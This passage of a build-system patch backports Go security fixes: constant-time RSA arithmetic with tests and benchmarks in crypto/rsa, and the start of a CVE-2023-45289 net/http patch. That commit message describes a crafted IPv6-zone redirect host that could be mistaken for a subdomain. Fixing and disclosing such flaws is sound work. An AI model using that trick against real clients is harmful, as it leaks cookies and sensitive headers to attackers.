++ aPlusOne.add(1, one)
++ m := modulusFromNat(aPlusOne)
++ monty := a.clone()
++ monty.montgomeryRepresentation(m)
++ aAgain := monty.clone()
++ aAgain.montgomeryMul(monty, one, m)
++ return a.cmpEq(aAgain) == 1
++}
++
++func TestMontgomeryRoundtrip(t *testing.T) {
++ err := quick.Check(testMontgomeryRoundtrip, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func TestFromBig(t *testing.T) {
++ expected := []byte{0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}
++ theBig := new(big.Int).SetBytes(expected)
++ actual := natFromBig(theBig).fillBytes(make([]byte, len(expected)))
++ if !bytes.Equal(actual, expected) {
++ t.Errorf("%+x != %+x", actual, expected)
++ }
++}
++
++func TestFillBytes(t *testing.T) {
++ xBytes := []byte{0xAA, 0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
++ x := natFromBytes(xBytes)
++ for l := 20; l >= len(xBytes); l-- {
++ buf := make([]byte, l)
++ rand.Read(buf)
++ actual := x.fillBytes(buf)
++ expected := make([]byte, l)
++ copy(expected[l-len(xBytes):], xBytes)
++ if !bytes.Equal(actual, expected) {
++ t.Errorf("%d: %+v != %+v", l, actual, expected)
++ }
++ }
++ for l := len(xBytes) - 1; l >= 0; l-- {
++ (func() {
++ defer func() {
++ if recover() == nil {
++ t.Errorf("%d: expected panic", l)
++ }
++ }()
++ x.fillBytes(make([]byte, l))
++ })()
++ }
++}
++
++func TestFromBytes(t *testing.T) {
++ f := func(xBytes []byte) bool {
++ if len(xBytes) == 0 {
++ return true
++ }
++ actual := natFromBytes(xBytes).fillBytes(make([]byte, len(xBytes)))
++ if !bytes.Equal(actual, xBytes) {
++ t.Errorf("%+x != %+x", actual, xBytes)
++ return false
++ }
++ return true
++ }
++
++ err := quick.Check(f, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++
++ f([]byte{0xFF, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88})
++ f(bytes.Repeat([]byte{0xFF}, _W))
++}
++
++func TestShiftIn(t *testing.T) {
++ if bits.UintSize != 64 {
++ t.Skip("examples are only valid in 64 bit")
++ }
++ examples := []struct {
++ m, x, expected []byte
++ y uint64
++ }{{
++ m: []byte{13},
++ x: []byte{0},
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{7},
++ }, {
++ m: []byte{13},
++ x: []byte{7},
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{11},
++ }, {
++ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
++ x: make([]byte, 9),
++ y: 0x7FFF_FFFF_FFFF_FFFF,
++ expected: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
++ }, {
++ m: []byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d},
++ x: []byte{0x00, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
++ y: 0,
++ expected: []byte{0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08},
++ }}
++
++ for i, tt := range examples {
++ m := modulusFromNat(natFromBytes(tt.m))
++ got := natFromBytes(tt.x).expandFor(m).shiftIn(uint(tt.y), m)
++ if got.cmpEq(natFromBytes(tt.expected).expandFor(m)) != 1 {
++ t.Errorf("%d: got %x, expected %x", i, got, tt.expected)
++ }
++ }
++}
++
++func TestModulusAndNatSizes(t *testing.T) {
++ // These are 126 bit (2 * _W on 64-bit architectures) values, serialized as
++ // 128 bits worth of bytes. If leading zeroes are stripped, they fit in two
++ // limbs, if they are not, they fit in three. This can be a problem because
++ // modulus strips leading zeroes and nat does not.
++ m := modulusFromNat(natFromBytes([]byte{
++ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}))
++ x := natFromBytes([]byte{
++ 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe})
++ x.expandFor(m) // must not panic for shrinking
++}
++
++func TestExpand(t *testing.T) {
++ sliced := []uint{1, 2, 3, 4}
++ examples := []struct {
++ in []uint
++ n int
++ out []uint
++ }{{
++ []uint{1, 2},
++ 4,
++ []uint{1, 2, 0, 0},
++ }, {
++ sliced[:2],
++ 4,
++ []uint{1, 2, 0, 0},
++ }, {
++ []uint{1, 2},
++ 2,
++ []uint{1, 2},
++ }, {
++ []uint{1, 2, 0},
++ 2,
++ []uint{1, 2},
++ }}
++
++ for i, tt := range examples {
++ got := (&nat{tt.in}).expand(tt.n)
++ if len(got.limbs) != len(tt.out) || got.cmpEq(&nat{tt.out}) != 1 {
++ t.Errorf("%d: got %x, expected %x", i, got, tt.out)
++ }
++ }
++}
++
++func TestMod(t *testing.T) {
++ m := modulusFromNat(natFromBytes([]byte{0x06, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d}))
++ x := natFromBytes([]byte{0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01})
++ out := new(nat)
++ out.mod(x, m)
++ expected := natFromBytes([]byte{0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09})
++ if out.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", out, expected)
++ }
++}
++
++func TestModSub(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{6}}
++ y := &nat{[]uint{7}}
++ x.modSub(y, m)
++ expected := &nat{[]uint{12}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++ x.modSub(y, m)
++ expected = &nat{[]uint{5}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++}
++
++func TestModAdd(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{6}}
++ y := &nat{[]uint{7}}
++ x.modAdd(y, m)
++ expected := &nat{[]uint{0}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++ x.modAdd(y, m)
++ expected = &nat{[]uint{7}}
++ if x.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", x, expected)
++ }
++}
++
++func TestExp(t *testing.T) {
++ m := modulusFromNat(&nat{[]uint{13}})
++ x := &nat{[]uint{3}}
++ out := &nat{[]uint{0}}
++ out.exp(x, []byte{12}, m)
++ expected := &nat{[]uint{1}}
++ if out.cmpEq(expected) != 1 {
++ t.Errorf("%+v != %+v", out, expected)
++ }
++}
++
++func makeBenchmarkModulus() *modulus {
++ m := make([]uint, 32)
++ for i := 0; i < 32; i++ {
++ m[i] = _MASK
++ }
++ return modulusFromNat(&nat{limbs: m})
++}
++
++func makeBenchmarkValue() *nat {
++ x := make([]uint, 32)
++ for i := 0; i < 32; i++ {
++ x[i] = _MASK - 1
++ }
++ return &nat{limbs: x}
++}
++
++func makeBenchmarkExponent() []byte {
++ e := make([]byte, 256)
++ for i := 0; i < 32; i++ {
++ e[i] = 0xFF
++ }
++ return e
++}
++
++func BenchmarkModAdd(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modAdd(y, m)
++ }
++}
++
++func BenchmarkModSub(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modSub(y, m)
++ }
++}
++
++func BenchmarkMontgomeryRepr(b *testing.B) {
++ x := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.montgomeryRepresentation(m)
++ }
++}
++
++func BenchmarkMontgomeryMul(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ out := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.montgomeryMul(x, y, m)
++ }
++}
++
++func BenchmarkModMul(b *testing.B) {
++ x := makeBenchmarkValue()
++ y := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ x.modMul(y, m)
++ }
++}
++
++func BenchmarkExpBig(b *testing.B) {
++ out := new(big.Int)
++ exponentBytes := makeBenchmarkExponent()
++ x := new(big.Int).SetBytes(exponentBytes)
++ e := new(big.Int).SetBytes(exponentBytes)
++ n := new(big.Int).SetBytes(exponentBytes)
++ one := new(big.Int).SetUint64(1)
++ n.Add(n, one)
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.Exp(x, e, n)
++ }
++}
++
++func BenchmarkExp(b *testing.B) {
++ x := makeBenchmarkValue()
++ e := makeBenchmarkExponent()
++ out := makeBenchmarkValue()
++ m := makeBenchmarkModulus()
++
++ b.ResetTimer()
++ for i := 0; i < b.N; i++ {
++ out.exp(x, e, m)
++ }
++}
+diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
+index a216be3..ce89f92 100644
+--- a/src/crypto/rsa/pkcs1v15.go
++++ b/src/crypto/rsa/pkcs1v15.go
+@@ -9,7 +9,6 @@ import (
+ "crypto/subtle"
+ "errors"
+ "io"
+- "math/big"
+
+ "crypto/internal/randutil"
+ )
+@@ -58,14 +57,11 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
+ em[len(em)-len(msg)-1] = 0
+ copy(mm, msg)
+
+- m := new(big.Int).SetBytes(em)
+- c := encrypt(new(big.Int), pub, m)
+-
+- return c.FillBytes(em), nil
++ return encrypt(pub, em), nil
+ }
+
+ // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
+-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ //
+ // Note that whether this function returns an error or not discloses secret
+ // information. If an attacker can cause this function to run repeatedly and
+@@ -76,7 +72,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
+ if err := checkPub(&priv.PublicKey); err != nil {
+ return nil, err
+ }
+- valid, out, index, err := decryptPKCS1v15(rand, priv, ciphertext)
++ valid, out, index, err := decryptPKCS1v15(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+@@ -87,7 +83,7 @@ func DecryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) ([]byt
+ }
+
+ // DecryptPKCS1v15SessionKey decrypts a session key using RSA and the padding scheme from PKCS#1 v1.5.
+-// If rand != nil, it uses RSA blinding to avoid timing side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ // It returns an error if the ciphertext is the wrong length or if the
+ // ciphertext is greater than the public modulus. Otherwise, no error is
+ // returned. If the padding is valid, the resulting plaintext message is copied
+@@ -114,7 +110,7 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
+ return ErrDecryption
+ }
+
+- valid, em, index, err := decryptPKCS1v15(rand, priv, ciphertext)
++ valid, em, index, err := decryptPKCS1v15(priv, ciphertext)
+ if err != nil {
+ return err
+ }
+@@ -130,26 +126,24 @@ func DecryptPKCS1v15SessionKey(rand io.Reader, priv *PrivateKey, ciphertext []by
+ return nil
+ }
+
+-// decryptPKCS1v15 decrypts ciphertext using priv and blinds the operation if
+-// rand is not nil. It returns one or zero in valid that indicates whether the
+-// plaintext was correctly structured. In either case, the plaintext is
+-// returned in em so that it may be read independently of whether it was valid
+-// in order to maintain constant memory access patterns. If the plaintext was
+-// valid then index contains the index of the original message in em.
+-func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
++// decryptPKCS1v15 decrypts ciphertext using priv. It returns one or zero in
++// valid that indicates whether the plaintext was correctly structured.
++// In either case, the plaintext is returned in em so that it may be read
++// independently of whether it was valid in order to maintain constant memory
++// access patterns. If the plaintext was valid then index contains the index of
++// the original message in em, to allow constant time padding removal.
++func decryptPKCS1v15(priv *PrivateKey, ciphertext []byte) (valid int, em []byte, index int, err error) {
+ k := priv.Size()
+ if k < 11 {
+ err = ErrDecryption
+ return
+ }
+
+- c := new(big.Int).SetBytes(ciphertext)
+- m, err := decrypt(rand, priv, c)
++ em, err = decrypt(priv, ciphertext)
+ if err != nil {
+ return
+ }
+
+- em = m.FillBytes(make([]byte, k))
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
+
+@@ -221,8 +215,7 @@ var hashPrefixes = map[crypto.Hash][]byte{
+ // function. If hash is zero, hashed is signed directly. This isn't
+ // advisable except for interoperability.
+ //
+-// If rand is not nil then RSA blinding will be used to avoid timing
+-// side-channel attacks.
++// The rand parameter is legacy and ignored, and it can be as nil.
+ //
+ // This function is deterministic. Thus, if the set of possible
+ // messages is small, an attacker may be able to build a map from
+@@ -249,13 +242,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
+ copy(em[k-tLen:k-hashLen], prefix)
+ copy(em[k-hashLen:k], hashed)
+
+- m := new(big.Int).SetBytes(em)
+- c, err := decryptAndCheck(rand, priv, m)
+- if err != nil {
+- return nil, err
+- }
+-
+- return c.FillBytes(em), nil
++ return decryptAndCheck(priv, em)
+ }
+
+ // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
+@@ -275,9 +262,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
+ return ErrVerification
+ }
+
+- c := new(big.Int).SetBytes(sig)
+- m := encrypt(new(big.Int), pub, c)
+- em := m.FillBytes(make([]byte, k))
++ em := encrypt(pub, sig)
+ // EM = 0x00 || 0x01 || PS || 0x00 || T
+
+ ok := subtle.ConstantTimeByteEq(em[0], 0)
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 814522d..eaba4be 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -12,7 +12,6 @@ import (
+ "errors"
+ "hash"
+ "io"
+- "math/big"
+ )
+
+ // Per RFC 8017, Section 9.1
+@@ -207,19 +206,27 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
+- emBits := priv.N.BitLen() - 1
++func signPSSWithSalt(priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
++ emBits := bigBitLen(priv.N) - 1
+ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+ return nil, err
+ }
+- m := new(big.Int).SetBytes(em)
+- c, err := decryptAndCheck(rand, priv, m)
+- if err != nil {
+- return nil, err
++
++ // RFC 8017: "Note that the octet length of EM will be one less than k if
++ // modBits - 1 is divisible by 8 and equal to k otherwise, where k is the
++ // length in octets of the RSA modulus n."
++ //
++ // This is extremely annoying, as all other encrypt and decrypt inputs are
++ // always the exact same size as the modulus. Since it only happens for
++ // weird modulus sizes, fix it by padding inefficiently.
++ if emLen, k := len(em), priv.Size(); emLen < k {
++ emNew := make([]byte, k)
++ copy(emNew[k-emLen:], em)
++ em = emNew
+ }
+- s := make([]byte, priv.Size())
+- return c.FillBytes(s), nil
++
++ return decryptAndCheck(priv, em)
+ }
+
+ const (
+@@ -269,7 +276,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
++ saltLength = (bigBitLen(priv.N)-1+7)/8 - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+@@ -278,7 +285,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ if _, err := io.ReadFull(rand, salt); err != nil {
+ return nil, err
+ }
+- return signPSSWithSalt(rand, priv, hash, digest, salt)
++ return signPSSWithSalt(priv, hash, digest, salt)
+ }
+
+ // VerifyPSS verifies a PSS signature.
+@@ -291,13 +298,22 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
+ if len(sig) != pub.Size() {
+ return ErrVerification
+ }
+- s := new(big.Int).SetBytes(sig)
+- m := encrypt(new(big.Int), pub, s)
+- emBits := pub.N.BitLen() - 1
++
++ emBits := bigBitLen(pub.N) - 1
+ emLen := (emBits + 7) / 8
+- if m.BitLen() > emLen*8 {
+- return ErrVerification
++ em := encrypt(pub, sig)
++
++ // Like in signPSSWithSalt, deal with mismatches between emLen and the size
++ // of the modulus. The spec would have us wire emLen into the encoding
++ // function, but we'd rather always encode to the size of the modulus and
++ // then strip leading zeroes if necessary. This only happens for weird
++ // modulus sizes anyway.
++ for len(em) > emLen && len(em) > 0 {
++ if em[0] != 0 {
++ return ErrVerification
++ }
++ em = em[1:]
+ }
+- em := m.FillBytes(make([]byte, emLen))
++
+ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index c3a6d46..d018b43 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
+@@ -233,7 +233,10 @@ func TestPSSSigning(t *testing.T) {
+ }
+ }
+
+-func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++func TestPSS513(t *testing.T) {
++ // See Issue 42741, and separately, RFC 8017: "Note that the octet length of
++ // EM will be one less than k if modBits - 1 is divisible by 8 and equal to
++ // k otherwise, where k is the length in octets of the RSA modulus n."
+ key, err := GenerateKey(rand.Reader, 513)
+ if err != nil {
+ t.Fatal(err)
+@@ -246,8 +249,9 @@ func TestSignWithPSSSaltLengthAuto(t *testing.T) {
+ if err != nil {
+ t.Fatal(err)
+ }
+- if len(signature) == 0 {
+- t.Fatal("empty signature returned")
++ err = VerifyPSS(&key.PublicKey, crypto.SHA256, digest[:], signature, nil)
++ if err != nil {
++ t.Error(err)
+ }
+ }
+
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a00ed2..29d9d31 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -19,13 +19,17 @@
+ // over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+-// The RSA operations in this package are not implemented using constant-time algorithms.
++// Operations in this package are implemented using constant-time algorithms,
++// except for [GenerateKey], [PrivateKey.Precompute], and [PrivateKey.Validate].
++// Every other operation only leaks the bit size of the involved values, which
++// all depend on the selected key size.
+ package rsa
+
+ import (
+ "crypto"
+ "crypto/rand"
+ "crypto/subtle"
++ "encoding/binary"
+ "errors"
+ "hash"
+ "io"
+@@ -35,7 +39,6 @@ import (
+ "crypto/internal/randutil"
+ )
+
+-var bigZero = big.NewInt(0)
+ var bigOne = big.NewInt(1)
+
+ // A PublicKey represents the public part of an RSA key.
+@@ -47,7 +50,7 @@ type PublicKey struct {
+ // Size returns the modulus size in bytes. Raw signatures and ciphertexts
+ // for or by this public key will have the same size.
+ func (pub *PublicKey) Size() int {
+- return (pub.N.BitLen() + 7) / 8
++ return (bigBitLen(pub.N) + 7) / 8
+ }
+
+ // OAEPOptions is an interface for passing options to OAEP decryption using the
+@@ -351,10 +354,19 @@ func mgf1XOR(out []byte, hash hash.Hash, seed []byte) {
+ // too large for the size of the public key.
+ var ErrMessageTooLong = errors.New("crypto/rsa: message too long for RSA public key size")
+
+-func encrypt(c *big.Int, pub *PublicKey, m *big.Int) *big.Int {
+- e := big.NewInt(int64(pub.E))
+- c.Exp(m, e, pub.N)
+- return c
++func encrypt(pub *PublicKey, plaintext []byte) []byte {
++
++ N := modulusFromNat(natFromBig(pub.N))
++ m := natFromBytes(plaintext).expandFor(N)
++
++ e := make([]byte, 8)
++ binary.BigEndian.PutUint64(e, uint64(pub.E))
++ for len(e) > 1 && e[0] == 0 {
++ e = e[1:]
++ }
++
++ out := make([]byte, modulusSize(N))
++ return new(nat).exp(m, e, N).fillBytes(out)
+ }
+
+ // EncryptOAEP encrypts the given message with RSA-OAEP.
+@@ -404,12 +416,7 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
+ mgf1XOR(db, hash, seed)
+ mgf1XOR(seed, hash, db)
+
+- m := new(big.Int)
+- m.SetBytes(em)
+- c := encrypt(new(big.Int), pub, m)
+-
+- out := make([]byte, k)
+- return c.FillBytes(out), nil
++ return encrypt(pub, em), nil
+ }
+
+ // ErrDecryption represents a failure to decrypt a message.
+@@ -451,98 +458,71 @@ func (priv *PrivateKey) Precompute() {
+ }
+ }
+
+-// decrypt performs an RSA decryption, resulting in a plaintext integer. If a
+-// random source is given, RSA blinding is used.
+-func decrypt(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
+- // TODO(agl): can we get away with reusing blinds?
+- if c.Cmp(priv.N) > 0 {
+- err = ErrDecryption
+- return
++// decrypt performs an RSA decryption of ciphertext into out.
++func decrypt(priv *PrivateKey, ciphertext []byte) ([]byte, error) {
++
++ N := modulusFromNat(natFromBig(priv.N))
++ c := natFromBytes(ciphertext).expandFor(N)
++ if c.cmpGeq(N.nat) == 1 {
++ return nil, ErrDecryption
+ }
+ if priv.N.Sign() == 0 {
+ return nil, ErrDecryption
+ }
+
+- var ir *big.Int
+- if random != nil {
+- randutil.MaybeReadByte(random)
+-
+- // Blinding enabled. Blinding involves multiplying c by r^e.
+- // Then the decryption operation performs (m^e * r^e)^d mod n
+- // which equals mr mod n. The factor of r can then be removed
+- // by multiplying by the multiplicative inverse of r.
+-
+- var r *big.Int
+- ir = new(big.Int)
+- for {
+- r, err = rand.Int(random, priv.N)
+- if err != nil {
+- return
+- }
+- if r.Cmp(bigZero) == 0 {
+- r = bigOne
+- }
+- ok := ir.ModInverse(r, priv.N)
+- if ok != nil {
+- break
+- }
+- }
+- bigE := big.NewInt(int64(priv.E))
+- rpowe := new(big.Int).Exp(r, bigE, priv.N) // N != 0
+- cCopy := new(big.Int).Set(c)
+- cCopy.Mul(cCopy, rpowe)
+- cCopy.Mod(cCopy, priv.N)
+- c = cCopy
+- }
+-
++ // Note that because our private decryption exponents are stored as big.Int,
++ // we potentially leak the exact number of bits of these exponents. This
++ // isn't great, but should be fine.
+ if priv.Precomputed.Dp == nil {
+- m = new(big.Int).Exp(c, priv.D, priv.N)
+- } else {
+- // We have the precalculated values needed for the CRT.
+- m = new(big.Int).Exp(c, priv.Precomputed.Dp, priv.Primes[0])
+- m2 := new(big.Int).Exp(c, priv.Precomputed.Dq, priv.Primes[1])
+- m.Sub(m, m2)
+- if m.Sign() < 0 {
+- m.Add(m, priv.Primes[0])
+- }
+- m.Mul(m, priv.Precomputed.Qinv)
+- m.Mod(m, priv.Primes[0])
+- m.Mul(m, priv.Primes[1])
+- m.Add(m, m2)
+-
+- for i, values := range priv.Precomputed.CRTValues {
+- prime := priv.Primes[2+i]
+- m2.Exp(c, values.Exp, prime)
+- m2.Sub(m2, m)
+- m2.Mul(m2, values.Coeff)
+- m2.Mod(m2, prime)
+- if m2.Sign() < 0 {
+- m2.Add(m2, prime)
+- }
+- m2.Mul(m2, values.R)
+- m.Add(m, m2)
+- }
+- }
+-
+- if ir != nil {
+- // Unblind.
+- m.Mul(m, ir)
+- m.Mod(m, priv.N)
+- }
+-
+- return
++ out := make([]byte, modulusSize(N))
++ return new(nat).exp(c, priv.D.Bytes(), N).fillBytes(out), nil
++ }
++
++ t0 := new(nat)
++ P := modulusFromNat(natFromBig(priv.Primes[0]))
++ Q := modulusFromNat(natFromBig(priv.Primes[1]))
++ // m = c ^ Dp mod p
++ m := new(nat).exp(t0.mod(c, P), priv.Precomputed.Dp.Bytes(), P)
++ // m2 = c ^ Dq mod q
++ m2 := new(nat).exp(t0.mod(c, Q), priv.Precomputed.Dq.Bytes(), Q)
++ // m = m - m2 mod p
++ m.modSub(t0.mod(m2, P), P)
++ // m = m * Qinv mod p
++ m.modMul(natFromBig(priv.Precomputed.Qinv).expandFor(P), P)
++ // m = m * q mod N
++ m.expandFor(N).modMul(t0.mod(Q.nat, N), N)
++ // m = m + m2 mod N
++ m.modAdd(m2.expandFor(N), N)
++
++ for i, values := range priv.Precomputed.CRTValues {
++ p := modulusFromNat(natFromBig(priv.Primes[2+i]))
++ // m2 = c ^ Exp mod p
++ m2.exp(t0.mod(c, p), values.Exp.Bytes(), p)
++ // m2 = m2 - m mod p
++ m2.modSub(t0.mod(m, p), p)
++ // m2 = m2 * Coeff mod p
++ m2.modMul(natFromBig(values.Coeff).expandFor(p), p)
++ // m2 = m2 * R mod N
++ R := natFromBig(values.R).expandFor(N)
++ m2.expandFor(N).modMul(R, N)
++ // m = m + m2 mod N
++ m.modAdd(m2, N)
++ }
++
++ out := make([]byte, modulusSize(N))
++ return m.fillBytes(out), nil
+ }
+
+-func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
+- m, err = decrypt(random, priv, c)
++func decryptAndCheck(priv *PrivateKey, ciphertext []byte) (m []byte, err error) {
++ m, err = decrypt(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+
+ // In order to defend against errors in the CRT computation, m^e is
+ // calculated, which should match the original ciphertext.
+- check := encrypt(new(big.Int), &priv.PublicKey, m)
+- if c.Cmp(check) != 0 {
++ check := encrypt(&priv.PublicKey, m)
++ if subtle.ConstantTimeCompare(ciphertext, check) != 1 {
+ return nil, errors.New("rsa: internal error")
+ }
+ return m, nil
+@@ -554,9 +534,7 @@ func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int
+ // Encryption and decryption of a given message must use the same hash function
+ // and sha256.New() is a reasonable choice.
+ //
+-// The random parameter, if not nil, is used to blind the private-key operation
+-// and avoid timing side-channel attacks. Blinding is purely internal to this
+-// function – the random data need not match that used when encrypting.
++// The random parameter is legacy and ignored, and it can be as nil.
+ //
+ // The label parameter must match the value given when encrypting. See
+ // EncryptOAEP for details.
+@@ -570,9 +548,7 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ return nil, ErrDecryption
+ }
+
+- c := new(big.Int).SetBytes(ciphertext)
+-
+- m, err := decrypt(random, priv, c)
++ em, err := decrypt(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+@@ -581,10 +557,6 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ lHash := hash.Sum(nil)
+ hash.Reset()
+
+- // We probably leak the number of leading zeros.
+- // It's not clear that we can do anything about this.
+- em := m.FillBytes(make([]byte, k))
+-
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+
+ seed := em[1 : hash.Size()+1]
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
new file mode 100644
index 0000000000..13d3510504
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
@@ -0,0 +1,121 @@
+From 20586c0dbe03d144f914155f879fa5ee287591a1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 11 Jan 2024 11:31:57 -0800
+Subject: [PATCH] [release-branch.go1.21] net/http, net/http/cookiejar: avoid
+ subdomain matches on IPv6 zones
+
+When deciding whether to forward cookies or sensitive headers
+across a redirect, do not attempt to interpret an IPv6 address
+as a domain name.
+
+Avoids a case where a maliciously-crafted redirect to an
+IPv6 address with a scoped addressing zone could be
+misinterpreted as a within-domain redirect. For example,
+we could interpret "::1%.www.example.com" as a subdomain
+of "www.example.com".
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes CVE-2023-45289
+Fixes #65385
+For #65065
+
+Change-Id: I8f463f59f0e700c8a18733d2b264a8bcb3a19599
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2131938
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173775
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569239
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/20586c0dbe03d144f914155f879fa5ee287591a1]
+CVE: CVE-2023-45289
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/client.go | 6 ++++++
+ src/net/http/client_test.go | 1 +
